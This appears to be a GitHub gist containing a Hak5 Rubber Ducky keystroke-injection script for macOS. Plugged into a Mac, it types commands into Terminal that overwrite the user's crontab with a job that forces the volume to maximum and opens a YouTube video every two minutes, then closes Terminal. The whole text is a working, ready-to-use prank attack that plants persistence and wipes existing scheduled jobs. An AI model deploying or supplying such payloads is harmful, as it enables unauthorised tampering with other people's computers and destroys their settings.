Hak5 Rubber Ducky USB payload for OSX that forces the volume to maximum and opens a YouTube video every 2 minutes
DEFAULTDELAY 250 | |
DELAY 750 | |
GUI SPACE | |
STRING terminal.app | |
ENTER | |
DELAY 100 | |
STRING echo "*/2 * * * * osascript -e 'set volume 7' && open 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'" | crontab - | |
ENTER | |
DELAY 100 | |
GUI q |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment